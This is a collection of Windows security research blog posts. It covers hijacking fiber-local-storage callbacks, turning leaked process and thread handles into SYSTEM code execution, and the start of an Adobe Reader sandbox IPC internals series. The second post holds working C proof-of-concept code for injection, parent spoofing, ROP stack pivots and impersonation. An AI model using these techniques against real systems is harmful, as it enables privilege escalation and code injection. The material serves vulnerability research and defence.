Anyway, PoC||GTFO, I’ve included some code below. In it, we overwrite the
msvcrt!_freefls call used to free the FLS buffer.
#ifdef _WIN64
#define FlsCallbackOffset 0x320
#else
#define FlsCallbackOffset 0x20c
#endif
void OverwriteFlsCallback(LPVOID dwNewAddr, HANDLE hProcess)
{
_NtQueryInformationProcess NtQueryInformationProcess = (_NtQueryInformationProcess)GetProcAddress(GetModuleHandleA("ntdll"),
"NtQueryInformationProcess");
const char *payload = "\xcc\xcc\xcc\xcc";
PROCESS_BASIC_INFORMATION pbi;
SIZE_T sCallback = 0, sRetLen = 0;
LPVOID lpBuf = NULL;
//
// allocate memory and write in our payload as one would normally do
//
lpBuf = VirtualAllocEx(hProcess, NULL, sizeof(SIZE_T), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, lpBuf, payload, sizeof(SIZE_T), NULL);
// now we need to fetch the remote process PEB
NtQueryInformationProcess(hProcess, PROCESSINFOCLASS(0), &pbi,
sizeof(PROCESS_BASIC_INFORMATION), NULL);
// read the FlsCallback address out of it
ReadProcessMemory(hProcess, (LPVOID)(((SIZE_T)pbi.PebBaseAddress) + FlsCallbackOffset),
(LPVOID)&sCallback, sizeof(SIZE_T), &sRetLen);
sCallback += 2 * sizeof(SIZE_T);
// we're targeting the _freefls call, so overwrite that with our payload
// address
WriteProcessMemory(hProcess, (LPVOID)sCallback, &dwNewAddr, sizeof(SIZE_T), &sRetLen);
}
I tested this on an updated Windows 10 x64 against notepad and mspaint; on
process exit, the callback is executed and we gain control over execution flow.
Pretty useful in the end; more on this soon…
Over the years I’ve seen and exploited the occasional leaked handle bug. These can be
particularly fun to toy with, as the handles aren’t always granted
PROCESS_ALL_ACCESS or THREAD_ALL_ACCESS, requiring a bit more ingenuity.
This post will address the various access rights assignable to handles and what we
can do to exploit them to gain elevated code execution. I’ve chosen to focus
specifically on process and thread handles as this seems to be the most common,
but surely other objects can be exploited in similar manner.
As background, while this bug can occur under various circumstances, I’ve most
commonly seen it manifest when some privileged process opens a handle with
bInheritHandle set to true. Once this happens, any child process of this
privileged process inherits the handle and all access it grants. As example,
assume a SYSTEM level process does this:
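For example, something as simple as the following (a sketch of the pattern, mirroring the test server further down):
// A privileged process opens an inheritable, full-access handle to itself;
// every child it spawns receives a copy of this handle.
HANDLE hLeaked = OpenProcess(PROCESS_ALL_ACCESS,    // generous access mask
                             TRUE,                  // bInheritHandle
                             GetCurrentProcessId());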
Since it’s allowing the opened handle to be inherited, any child process
will gain access to it. If they execute userland code impersonating the desktop
user, as a service might often do, those userland processes will have access to
that handle.
Existing bugs
There are several public bugs we can point to over the years as example and
inspiration. As per usual James Forshaw has a fun one from 2016[0] in which
he’s able to leak a privileged thread handle out of the secondary logon
service with THREAD_ALL_ACCESS. This is the most “open” of permissions, but
he exploited it in a novel way that I was unaware of, at the time.
Another one from Ivan Fratric exploited[1] a leaked process handle with
PROCESS_DUP_HANDLE, which even Microsoft knew was bad. In his Bypassing
Mitigations by Attacking JIT Server in Microsoft Edge whitepaper, he
identifies the JIT server process mapping memory into the content process. To
do this, the JIT process needs a handle to it. The content process calls
DuplicateHandle on itself with the PROCESS_DUP_HANDLE, which can be
exploited to obtain a full access handle.
A more recent example is a Dell LPE [2] in which a THREAD_ALL_ACCESS handle
was obtained from a privileged process. They were able to exploit this via a
dropped DLL and an APC.
Setup
In this post, I wanted to examine all possible access rights to determine which
were exploitable on their own and which were not. Of those that were not, I
tried to determine what concoction of privileges were necessary to make it so.
I’ve tried to stay “realistic” here in my experience, but you never know what
you’ll find in the wild, and this post reflects that.
For testing, I created a simple client and server: a privileged server that
leaks a handle, and a client capable of consuming it. Here’s the server:
#include "pch.h"
#include <iostream>
#include <Windows.h>
int main(int argc, char **argv)
{
if (argc <= 1) {
printf("[-] Please give me a target PID\n");
return -1;
}
HANDLE hUserToken, hUserProcess;
HANDLE hProcess, hThread;
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
hUserProcess = OpenProcess(PROCESS_QUERY_INFORMATION, false, atoi(argv[1]));
if (!OpenProcessToken(hUserProcess, TOKEN_ALL_ACCESS, &hUserToken)) {
printf("[-] Failed to open user process: %d\n", GetLastError());
CloseHandle(hUserProcess);
return -1;
}
hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());
printf("[+] Process: %x\n", hProcess);
CreateProcessAsUserA(hUserToken,
"VulnServiceClient.exe",
NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
// suspend ourselves so the privileged process (and the leaked handle) stays alive
SuspendThread(GetCurrentThread());
return 0;
}
In the above, I’m grabbing a handle to the token we want to impersonate,
opening an inheritable handle to the current process (which we’re running as
SYSTEM), then spawning a child process. This child process is simply my client
application, which will go about attempting to exploit the handle.
The client is, of course, a little more involved. The only component that needs
a little discussion up front is fetching the leaked handle. This can be done
via NtQuerySystemInformation and does not require any special privileges:
void ProcessHandles()
{
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    _NtQuerySystemInformation NtQuerySystemInformation =
        (_NtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation");
    _NtDuplicateObject NtDuplicateObject =
        (_NtDuplicateObject)GetProcAddress(hNtdll, "NtDuplicateObject");
    _NtQueryObject NtQueryObject =
        (_NtQueryObject)GetProcAddress(hNtdll, "NtQueryObject");
    _RtlEqualUnicodeString RtlEqualUnicodeString =
        (_RtlEqualUnicodeString)GetProcAddress(hNtdll, "RtlEqualUnicodeString");
    _RtlInitUnicodeString RtlInitUnicodeString =
        (_RtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");

    ULONG handleInfoSize = 0x10000;
    NTSTATUS status;
    PSYSTEM_HANDLE_INFORMATION phHandleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
    DWORD dwPid = GetCurrentProcessId();

    printf("[+] Looking for process handles...\n");

    // NtQuerySystemInformation won't tell us how big the buffer needs to be,
    // so keep doubling it until the call succeeds
    while ((status = NtQuerySystemInformation(
        SystemHandleInformation,
        phHandleInfo,
        handleInfoSize,
        NULL
    )) == STATUS_INFO_LENGTH_MISMATCH)
        phHandleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(phHandleInfo, handleInfoSize *= 2);

    if (status != STATUS_SUCCESS)
    {
        printf("NtQuerySystemInformation failed!\n");
        return;
    }

    printf("[+] Fetched %d handles\n", phHandleInfo->HandleCount);

    // iterate handles until we find the privileged process
    for (int i = 0; i < phHandleInfo->HandleCount; ++i)
    {
        SYSTEM_HANDLE handle = phHandleInfo->Handles[i];
        POBJECT_TYPE_INFORMATION objectTypeInfo;
        PVOID objectNameInfo;
        UNICODE_STRING objectName;
        ULONG returnLength;

        // Check if this handle belongs to the PID the user specified
        if (handle.ProcessId != dwPid)
            continue;

        objectTypeInfo = (POBJECT_TYPE_INFORMATION)malloc(0x1000);
        if (NtQueryObject(
            (HANDLE)handle.Handle,
            ObjectTypeInformation,
            objectTypeInfo,
            0x1000,
            NULL
        ) != STATUS_SUCCESS)
        {
            free(objectTypeInfo);
            continue;
        }

        // skip handles with this access mask; querying their names can hang
        if (handle.GrantedAccess == 0x0012019f)
        {
            free(objectTypeInfo);
            continue;
        }

        objectNameInfo = malloc(0x1000);
        if (NtQueryObject(
            (HANDLE)handle.Handle,
            ObjectNameInformation,
            objectNameInfo,
            0x1000,
            &returnLength
        ) != STATUS_SUCCESS)
        {
            // the name was too big for our buffer; retry with the size it gave us
            objectNameInfo = realloc(objectNameInfo, returnLength);
            if (NtQueryObject(
                (HANDLE)handle.Handle,
                ObjectNameInformation,
                objectNameInfo,
                returnLength,
                NULL
            ) != STATUS_SUCCESS)
            {
                free(objectTypeInfo);
                free(objectNameInfo);
                continue;
            }
        }

        // check if we've got a process object; there should only be one, but should we
        // have multiple, this is where we'd perform the checks
        objectName = *(PUNICODE_STRING)objectNameInfo;
        UNICODE_STRING pProcess, pThread;
        RtlInitUnicodeString(&pThread, L"Thread");
        RtlInitUnicodeString(&pProcess, L"Process");

        if (RtlEqualUnicodeString(&objectTypeInfo->Name, &pProcess, TRUE) && TARGET == 0) {
            printf("[+] Found process handle (%x)\n", handle.Handle);
            HANDLE hProcess = (HANDLE)handle.Handle;
        }
        else if (RtlEqualUnicodeString(&objectTypeInfo->Name, &pThread, TRUE) && TARGET == 1) {
            printf("[+] Found thread handle (%x)\n", handle.Handle);
            HANDLE hThread = (HANDLE)handle.Handle;
        }
        else
            continue;

        free(objectTypeInfo);
        free(objectNameInfo);
    }
}
We’re essentially just fetching all system handles, filtering down to ones
belonging to our process, then hunting for a thread or a process. In a more
active client process with many threads or process handles we’d need to filter
down further, but this is sufficient for testing.
The remainder of this post will be broken down into process and thread security
access rights.
Process
There are approximately 14 process-specific rights[3]. We’re going to ignore
the standard object access rights for now (DELETE, READ_CONTROL, etc.) as they
apply more to the handle itself than what it allows one to do.
Right off the bat, we’re going to dismiss the following:
To be clear, I’m only suggesting that the above access rights cannot be
exploited on their own; they are, of course, very useful when roped in with
others. There may be weird edge cases in which one of these might be useful
(PROCESS_TERMINATE, for example), but barring any magic, I don’t see how.
PROCESS_CREATE_PROCESS
This right is “required to create a process”, which is to say that we can spawn
child processes. To do this remotely, we just need to spawn a process and set
its parent to the privileged process we’ve got a handle to. The new process
will then inherit its parent’s token, which will hopefully be a SYSTEM token.
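A minimal sketch of that parent spoofing, assuming hPrivileged is the leaked PROCESS_CREATE_PROCESS handle (calc.exe standing in for a real payload):
STARTUPINFOEXA si = { 0 };
PROCESS_INFORMATION pi = { 0 };
SIZE_T attrSize = 0;
char cmdline[] = "calc.exe";

si.StartupInfo.cb = sizeof(si);

// build an attribute list holding PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
InitializeProcThreadAttributeList(NULL, 1, 0, &attrSize);
si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)malloc(attrSize);
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attrSize);
UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
                          &hPrivileged, sizeof(HANDLE), NULL, NULL);

// the child is created as if hPrivileged were its parent and inherits its token
CreateProcessA(NULL, cmdline, NULL, NULL, FALSE,
               EXTENDED_STARTUPINFO_PRESENT, NULL, NULL,
               &si.StartupInfo, &pi);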
We should now have calc running with the privileged token. Obviously we’d want
to replace that with something more useful!
PROCESS_CREATE_THREAD
Here we’ve got the ability to use CreateRemoteThread, but can’t control any
memory in the target process. There are of course ways we can influence memory
without direct write access, such as WNF, but we’d still have no way of
resolving those addresses. As it turns out, however, we don’t need the control.
CreateRemoteThread can be pointed at a function with a single argument, which
gives us quite a bit of control. LoadLibraryA and WinExec are both great
candidates for executing child processes or loading arbitrary code.
As an example, there’s an ANSI cmd.exe string located in msvcrt.dll at offset 0x503b8.
We can pass this as an argument to CreateRemoteThread and trigger a WinExec
call to pop a shell:
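A rough sketch of the idea, assuming hPrivileged is the leaked process handle; the msvcrt.dll offset is specific to the build being tested, and since system DLL bases are shared across processes in a session, an address computed locally is valid in the target:
// "cmd.exe" string inside msvcrt.dll (offset is build specific)
char *cmdStr = (char *)GetModuleHandleA("msvcrt.dll") + 0x503b8;
LPTHREAD_START_ROUTINE pWinExec =
    (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("kernel32.dll"), "WinExec");

// the thread's start parameter becomes WinExec's first argument
CreateRemoteThread(hPrivileged, NULL, 0, pWinExec, cmdStr, 0, NULL);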
We can do something similar for LoadLibraryA. This of course is predicated on
the system path containing a writable directory for our user.
PROCESS_DUP_HANDLE
Microsoft’s own documentation on process security and access rights points to
this specifically as a sensitive right. Using it, we can simply duplicate our
process handle with PROCESS_ALL_ACCESS, allowing us full RW to its address
space. As per Ivan Fratric’s JIT bug, it’s as simple as this:
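A sketch of that duplication, with hLeaked standing in for the recovered PROCESS_DUP_HANDLE handle:
HANDLE hFull = NULL;

// in the context of the source process, the pseudo-handle (-1) refers to the
// privileged process itself, so we get back a full-access handle to it
DuplicateHandle(hLeaked,              // source process (we only need PROCESS_DUP_HANDLE)
                GetCurrentProcess(),  // source "handle": the current-process pseudo-handle
                GetCurrentProcess(),  // duplicate into our own process
                &hFull,
                PROCESS_ALL_ACCESS,
                FALSE,
                0);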
Now we can simply follow the WriteProcessMemory/CreateRemoteThread strategy for
executing arbitrary code.
PROCESS_SET_INFORMATION
Granting this permission allows one to call SetProcessInformation, in addition
to setting several fields via NtSetInformationProcess. The latter is far more
powerful, but many of the PROCESSINFOCLASS fields available are either read
only or require additional privileges to actually set (SeDebugPrivilege for
ProcessExceptionPort and ProcessInstrumentationCallback (Win7), for
example). Process Hacker[15] maintains an up to date definition of this class
and its members.
Of the available flags, none were particularly interesting on their own. I
needed to add PROCESS_VM_* privileges in order to make any of them usable, and
at that point we defeat the purpose.
PROCESS_VM_*
This covers the three flavors of VM access: WRITE/READ/OPERATION. The first two
should be self-explanatory and the third allows one to operate on the virtual
address space itself, such as changing page protections (VirtualProtectEx) or
allocating memory (VirtualAllocEx). I won’t address each permutation of these
three, but I think it’s reasonable to assume that PROCESS_VM_WRITE is a
necessary requirement. While PROCESS_VM_OPERATION allows us to crash the
remote process, which could open up other flaws, it’s neither a generic nor an
elegant approach. Ditto for PROCESS_VM_READ.
PROCESS_VM_WRITE proved to be a challenge on its own, and I was unable to
come up with a generic solution. At first blush, the entire set of
Shatter-like injection strategies documented by Hexacorn[12] seem like
they’d be perfect. They simply require the remote process to use windows,
clipboard registrations, etc. None of these are guaranteed, but chances are one
is bound to exist. Unfortunately for us, many of them restrict access across
sessions or integrity levels. We can write into the remote process, but we
need some way to gain control over execution flow.
In addition to being unable to modify page permissions, we cannot read nor
map/allocate memory. There are plenty of ways we can leak memory from the
remote process without directly interfacing with it, however.
Using NtQuerySystemInformation, for example, we can enumerate all threads
inside a remote process regardless of its IL. This grants us a list of
SYSTEM_EXTENDED_THREAD_INFORMATION objects which contain, among other
things, the address of the TEB. NtQueryInformationProcess allows us to fetch
the remote process PEB address. This latter API requires the
PROCESS_QUERY_INFORMATION right, however, which ended up throwing a major
wrench in my plan. Because of this I’m appending PROCESS_QUERY_INFORMATION
onto PROCESS_VM_WRITE which gives us the necessary components to pull this
off. If someone knows of a way to leak the address of a remote process PEB
without it, I’d love to hear.
The approach I took was a bit loopy, but it ended up working reliably and
generically. If you’ve read my previous post on fiber local storage (FLS)[13],
this is the research I was referring to. If you haven’t, I recommend giving it
a brief read, but I’ll regurgitate a bit of it here.
Briefly, we can abuse fibers and FLS to overwrite callbacks which are executed
“…on fiber deletion, thread exit, and when an FLS index is freed”. The
primary thread of a process will always setup a fiber, thus there will always
be a callback for us to overwrite (msvcrt!_freefls). Callbacks are stored in
the PEB (FlsCallback) and the fiber local storage in the TEB (FlsData). By
smashing the FlsCallback we can obtain control over execution flow when one of
the fiber actions are taken.
With only write access to the process, however, this becomes a bit convoluted.
We cannot allocate memory and so we need some known location to put the
payload. In addition, the FlsCallback and FlsData variables in PEB/TEB are
pointers and we’re unable to read these.
Stashing the payload turned out to be pretty simple. Since we’ve established
we can leak PEB/TEB addresses we already have two powerful primitives. After
looking over both structures, I found that thread local storage (TLS) happened
to provide us with enough room to store ROP gadgets and a thin payload. TLS is
embedded within the structure itself, so we can simply offset into the TEB
address (which we have). If you’re unfamiliar with TLS, Skywing’s write-ups are
fantastic and have aged well[14].
Gaining control over the callback was a little trickier. A pointer to a
_FLS_CALLBACK_INFO structure is stored in the PEB (FlsCallback) and is an
opaque structure. Since we can’t actually read this pointer, we have no simple
way of overwriting the pointer. Or do we?
What I ended up doing is overwriting the FlsCallback pointer itself in the PEB,
essentially creating my own fake _FLS_CALLBACK_INFO structure in TLS. It’s a
pretty simple structure and really only has one value of importance: the
callback pointer.
In addition, as per the FLS article, we also need to take control over ECX/RCX.
This will allow us to stack pivot and continue executing our ROP payload. This
requires that we update the TEB->FlsData entry which we also are unable to
do, since it’s a pointer. Much like FlsCallback, though, I was able to just
overwrite this value and craft my own data structure, which also turned out to
be pretty simple. The TLS buffer ended up looking like this:
There just so happens to be a perfect stack pivot gadget located in
kernelbase!SwitchToFiberContext (or kernel32!SwitchToFiber on Windows 7):
7603c415 8ba1d8000000 mov esp,dword ptr [ecx+0D8h]
7603c41b c20400 ret 4
Putting this all together, execution results in:
eax=7603c415 ebx=7ffdf000 ecx=7ffded54 edx=00280bc9 esi=00000001 edi=7ffdee28
eip=7603c415 esp=0019fd6c ebp=0019fd84 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
kernel32!SwitchToFiber+0x115:
7603c415 8ba1d8000000 mov esp,dword ptr [ecx+0D8h]
ds:0023:7ffdee2c=7ffdee30
0:000> p
eax=7603c415 ebx=7ffdf000 ecx=7ffded54 edx=00280bc9 esi=00000001 edi=7ffdee28
eip=7603c41b esp=7ffdee30 ebp=0019fd84 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
kernel32!SwitchToFiber+0x11b:
7603c41b c20400 ret 4
0:000> dd esp l3
7ffdee30 41414141 41414141 41414141
Now we’ve got EIP and a stack pivot. Instead of marking memory and executing
some other payload, I took a quick and lazy strategy and simply called
LoadLibraryA to load a DLL off disk from an arbitrary location. This works
well, is reliable, and even on process exit will execute and block, depending
on what you do within the DLL. Here’s the final code to achieve all this:
If all works well you should see attempts to load AAAA.dll off disk when the
callback is executed (just close the process). As a note, we’re using
NtWriteVirtualMemory here because WriteProcessMemory requires
PROCESS_VM_OPERATION which we may not have.
Another variation of this access might be PROCESS_VM_WRITE|PROCESS_VM_READ.
This gives us visibility into the address space, but we still cannot allocate
or map memory into the remote process. Using the above strategy we can rid
ourselves of the PROCESS_QUERY_INFORMATION requirement and simply read the
PEB address out of TEB.
Finally, consider PROCESS_VM_WRITE|PROCESS_VM_READ|PROCESS_VM_OPERATION.
Granting us PROCESS_VM_OPERATION loosens the restrictions quite a bit, as we
can now allocate memory and change page permissions. This allows us to more
easily use the above strategy, but also perform inline and IAT hooks.
Thread
As with the process handles, there are a handful of access rights we can dismiss
immediately:
THREAD_ALL_ACCESS
There’s quite a lot we can do with this, including everything described in the
following thread access rights sections. I personally find the
THREAD_DIRECT_IMPERSONATION strategy to be the easiest.
There is another option that is a bit more arcane, but equally viable. Note
that this thread access doesn’t give us VM read/write privileges, so there’s
no easy way to “write” into a thread, since that doesn’t really make sense.
What we do have, however, is a series of APIs that sort of grant us that:
SetThreadContext[4] and GetThreadContext[5]. About a decade ago a code
injection technique dubbed Ghostwriting[6] was released to little fanfare. In
it, the author describes a code injection strategy that does not require the
typical win32 API calls; there’s no WriteProcessMemory, NtMapViewOfSection, or
even OpenProcess.
While the write-up is lacking in a few departments, it’s quite a clever bit of
code. In short, the author abuses the SetThreadContext/GetThreadContext
calls in tandem with a set of specific assembly gadgets to write a payload,
dword by dword, onto the thread’s stack. Once written, they use
NtProtectVirtualMemory to mark the code RWX and redirect code flow to
their payload.
For their write gadget, they hunt for a pattern inside NTDLL:
MOV [REG1], REG2
RET
They then locate a JMP $, or jump-to-self, which will operate as an auto lock
and infinitely loop. Once we’ve found our two gadgets, we suspend the thread.
We update its RIP to point to the MOV gadget, set our REG1 to an adjusted RSP
so the return address is the JMP $, and set REG2 to the jump gadget. Here’s
my write function:
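The original function isn’t reproduced here; a rough sketch of such a context-based write primitive looks like the following, assuming movGadget points at the mov [rcx], rdx ; ret sequence and jmpGadget at the jmp $ sink (names and register choices are mine):
// assumes REG1 == RCX and REG2 == RDX in the located gadget
void SetContextRegister(CONTEXT *ctx, ULONG_PTR dest, ULONG_PTR value)
{
    ctx->Rcx = dest;    // REG1: where the value lands
    ctx->Rdx = value;   // REG2: what gets written
}

// write `value` to `dest` in the remote process by hijacking the thread's context
void WriteRemoteValue(HANDLE hThread, ULONG_PTR dest, ULONG_PTR value,
                      ULONG_PTR movGadget, ULONG_PTR jmpGadget)
{
    CONTEXT ctx = { 0 };
    ctx.ContextFlags = CONTEXT_FULL;

    SuspendThread(hThread);
    GetThreadContext(hThread, &ctx);

    SetContextRegister(&ctx, dest, value);
    ctx.Rip = movGadget;    // execute mov [REG1], REG2 ; ret
    // the gadget's RET must land on the jmp $ sink; on the very first write,
    // dest is the adjusted RSP itself so the sink address ends up on the stack

    SetThreadContext(hThread, &ctx);
    ResumeThread(hThread);
}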
The SetContextRegister call simply assigns REG1 and REG2 in our gadget to the
appropriate registers. Once those are set, we set our stack base (adjusted from
threads RSP) and update RIP to our gadget. The first time we execute this we’ll
write our JMP $ gadget to the stack.
They use what they call a thread auto lock to control execution flow (edits
mine):
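The original snippet isn’t reproduced here either; the gist, as a sketch, is a loop along these lines:
// paraphrased sketch of the "thread auto lock": let the thread run briefly,
// then check whether RIP has reached the jmp $ sink yet
void WaitForSink(HANDLE hThread, ULONG_PTR jmpGadget)
{
    CONTEXT ctx = { 0 };
    ctx.ContextFlags = CONTEXT_CONTROL;

    for (;;) {
        ResumeThread(hThread);
        Sleep(20);                      // let it execute a little
        SuspendThread(hThread);
        GetThreadContext(hThread, &ctx);
        if (ctx.Rip == jmpGadget)       // parked on the sink: the write landed
            break;
    }
}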
It’s really just a dumb waiter that allows the thread to execute a little bit
each run before checking if the “sink” gadget has been reached.
Once our execution hits the jump, we have our write primitive. We can now
simply adjust RIP back to the MOV gadget, update RSP, and set REG1 and REG2 to
any values we want.
I ported the core function of this technique to x64 to demonstrate its
viability. Instead of using it to execute an entire payload, I simply execute
LoadLibraryA to load in an arbitrary DLL at an arbitrary path. The code is
available on Github[11]. Turning it into something production ready is left as
an exercise for the reader ;)
Additionally, while attending Blackhat 2019, I saw a process injection talk by
the SafeBreach Labs group. They’ve released a code injection tool that contains
an x64 implementation of GhostWriting[10]. While I haven’t personally evaluated
it, it’s probably more production ready and usable than mine.
THREAD_DIRECT_IMPERSONATION
This differs from THREAD_IMPERSONATE in that it allows the thread token to be
impersonated, not simply TO impersonate. Exploiting this is simply a matter of
using the NtImpersonateThread[8] API, as pointed out by James Forshaw[0][7].
Using this we’re able to create a thread totally under our control and
impersonate the privileged one:
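A sketch of that, assuming hLeakedThread is the leaked handle and PrivilegedWork is a placeholder for whatever we want to run under the stolen context; NtImpersonateThread is resolved out of ntdll:
typedef NTSTATUS (NTAPI *pNtImpersonateThread)(HANDLE, HANDLE, PSECURITY_QUALITY_OF_SERVICE);

SECURITY_QUALITY_OF_SERVICE sqos = { 0 };
sqos.Length = sizeof(sqos);
sqos.ImpersonationLevel = SecurityImpersonation;

// a thread of ours, parked until the impersonation token has been applied
HANDLE hNewThread = CreateThread(NULL, 0, PrivilegedWork, NULL, CREATE_SUSPENDED, NULL);

pNtImpersonateThread NtImpersonateThread = (pNtImpersonateThread)
    GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtImpersonateThread");

// give our thread the leaked thread's (SYSTEM) context as its impersonation token
NtImpersonateThread(hNewThread, hLeakedThread, &sqos);
ResumeThread(hNewThread);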
The hNewThread will now be executing with a SYSTEM token, allowing us to do
whatever we need under the privileged impersonation context.
THREAD_IMPERSONATE
Unfortunately I was unable to identify a surefire, generic method for
exploiting this one. We have no ability to query the remote thread, nor can we
gain any control over its execution flow. We’re simply allowed to manage its
impersonation state.
We can use this to force the privileged thread to impersonate us, using the
NtImpersonateThread call, which may unlock additional logic bugs in the
application. For example, if the service were to create shared resources under
a user context for which it would typically be SYSTEM, such as a file, we can
gain ownership over that file. If multiple privileged threads access it for
information (such as configuration) it could lead to code execution.
THREAD_SET_CONTEXT
While this right grants us access to SetThreadContext, it also conveniently
allows us to use QueueUserAPC. This is effectively granting us a
CreateRemoteThread primitive, with a caveat. For an APC to be processed by the
thread, it needs to enter an alertable state. This happens when a specific set
of win32 functions are executed, so it is entirely possible that the thread
never becomes alertable.
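A sketch of the idea, reusing the msvcrt.dll cmd.exe string trick from the process section (again, the offset is build specific and hLeakedThread is the leaked thread handle):
LPVOID cmdStr = (LPVOID)((ULONG_PTR)GetModuleHandleA("msvcrt.dll") + 0x503b8);   // "cmd.exe"
PAPCFUNC pWinExec =
    (PAPCFUNC)GetProcAddress(GetModuleHandleA("kernel32.dll"), "WinExec");

// queued immediately, but only delivered once the thread enters an alertable wait
QueueUserAPC(pWinExec, hLeakedThread, (ULONG_PTR)cmdStr);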
If we’re working with an uncooperative thread, SetThreadContext comes in
handy. Using it, we can force the thread to become alertable via the
NtTestAlert function. Of course, we have no ability to call
GetThreadContext and will therefore likely lose control of the thread after
exploitation.
In combination with THREAD_GET_CONTEXT, this right would allow us to
replicate the Ghostwriting code injection technique discussed in the
THREAD_ALL_ACCESS section above.
THREAD_SET_INFORMATION
Needed to set various ThreadInformationClass[9] values on a thread, usually via
NtSetInformationThread. After looking through all of these, I did not
identify any immediate ways in which we could influence the remote thread. Some
of the values are interesting but unusable (ThreadSetTlsArrayAddress,
ThreadAttachContainer, etc) and are either not implemented/removed or
require SeDebugPrivilege or similar.
I’m not really sure what would make this a viable candidate either. There’s
really not a lot of juicy stuff that can be done via the available functions.
THREAD_SET_LIMITED_INFORMATION
This allows the caller to set a subset of THREAD_INFORMATION_CLASS values,
namely: ThreadPriority, ThreadPriorityBoost, ThreadAffinityMask,
ThreadSelectedCpuSets, and ThreadNameInformation. None of these get us
anywhere near an exploitable primitive.
THREAD_SET_THREAD_TOKEN
Similar to THREAD_IMPERSONATE, I was unable to find a direct and generic
method of abusing this right. I can set the thread’s token or modify a few
fields (via SetTokenInformation), but this doesn’t grant us much.
Conclusion
I was a little disappointed in how uneventful thread rights seemed to be.
Almost half of them proved to be unexploitable on their own, and even in
combination did not turn much up. As per above, having one of the following
three privileges is necessary to turn a leaked thread handle into something
exploitable:
This post kicks off a short series into reversing the Adobe Reader sandbox. I initially started this research early last year and have been working on it off and on since. This series will document the Reader sandbox internals, present a few tools for reversing/interacting with it, and describe the results of this research. There may be quite a bit of content here, but I’ll be doing a lot of braindumping. I find posts that document process, failure, and attempts to be far more insightful as a researcher than pure technical results.
I’ve broken this research up into two posts. Maybe more, we’ll see. The first here will detail the internals of the sandbox and introduce a few tools developed, and the second will focus on fuzzing and the results of that effort.
This post focuses primarily on the IPC channel used to communicate between the sandboxed process and the broker. I do not delve into how the policy engine works or many of the restrictions enabled.
Introduction
This is by no means the first dive into the Adobe Reader sandbox. Here are a few prior examples of great work:
Breeding Sandworms was a particularly useful introduction to the sandbox, as it describes in some detail the internals of transactions and how they approached fuzzing the sandbox. I’ll detail my approach and improvements in
part two of this series.
In addition, the ZDI crew of Abdul-Aziz Hariri, et al. have been hammering on
the Javascript side of things for what seems like forever (Abusing Adobe Reader’s Javascript APIs)
and have done some great work in this area.
After evaluating existing research, however, it seemed like there was more work to be done in a more open source fashion. Most sandbox escapes in Reader these days opt instead to target Windows itself via win32k/dxdiag/etc and not the sandbox broker. This makes some sense, but leaves a lot of attack surface unexplored.
Note that all research was done on Acrobat Reader DC 20.6.20034 on a Windows 10 machine. You can fetch installers for old versions of Adobe Reader
here.
I highly recommend bookmarking this. One of my favorite things to do on a new target is pull previous bugs and affected versions and run through root cause and exploitation.
Sandbox Internals Overview
Adobe Reader’s sandbox is known as protected mode and is on by default, but can be toggled on/off via preferences or the registry. Once Reader launches, a child process is spawned under low integrity and a shared memory
section mapped in. Inter-process communication (IPC) takes place over this channel, with the parent process acting as the broker.
Adobe actually published some of the sandbox source code to Github over 7 years ago, but it does not contain any of their policies or modern tag interfaces. It’s useful for figuring out variables and function names during reversing,
and the source code is well written and full of useful comments, so I recommend pulling it up.
Reader uses the Chromium sandbox (pre Mojo), and I recommend the following resources for the specifics here:
These days it’s known as the “legacy IPC” and has been replaced by Mojo in Chrome. Reader actually uses Mojo to communicate between its RdrCEF (Chromium Embedded Framework) processes which handle cloud connectivity, syncing, etc. It’s possible Adobe plans to replace the broker legacy API with Mojo at some point, but this has not been announced/released yet.
We’ll start by taking a brief look at how a target process is spawned, but the main focus of this post will be the guts of the IPC mechanisms in play. Execution of the child process first begins with BrokerServicesBase::SpawnTarget.
This function crafts the target process and its restrictions. Some of these
are described here in greater detail, but they are as follows:
1. Create restricted token
- via `CreateRestrictedToken`
- Low integrity or AppContainer if available
2. Create restricted job object
- No RW to clipboard
- No access to user handles in other processes
- No message broadcasts
- No global hooks
- No global atoms table access
- No changes to display settings
- No desktop switching/creation
- No ExitWindows calls
- No SystemParametersInfo
- One active process
- Kill on close/unhandled exception
From here, the policy manager enforces interceptions, handled by the
InterceptionManager,
which handles hooking and rewiring various Win32 functions via the target process to the broker. According to documentation, this is not for security, but rather:
[..] designed to provide compatibility when code inside the sandbox cannot be modified to cope with sandbox restrictions. To save unnecessary IPCs, policy is also evaluated in the target process before making an IPC call, although this is not used as a security guarantee but merely a speed optimization.
From here we can now take a look at how the IPC mechanisms between the target and broker process actually work.
The broker process is responsible for spawning the target process, creating a shared memory mapping, and initializing the requisite data structures. This shared memory mapping is the medium in which the broker and target communicate and exchange data. If the target wants to make an IPC call, the following happens at a high level:
The target finds a channel in a free state
The target serializes the IPC call parameters to the channel
The target then signals an event object for the channel (ping event)
The target waits until a pong event is signaled
At this point, the broker executes ThreadPingEventReady, the IPC processor entry point, where the following occurs:
The broker deserializes the call arguments in the channel
Sanity checks the parameters and the call
Executes the callback
Writes the return structure back to the channel
Signals that the call is completed (pong event)
There are 16 channels available for use, meaning that the broker can service up to 16 concurrent IPC requests at a time. The following diagram describes a high level view of this architecture:
From the broker’s perspective, a channel can be viewed like so:
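Roughly, going by the published Chromium sandbox source (Reader’s build may differ slightly):
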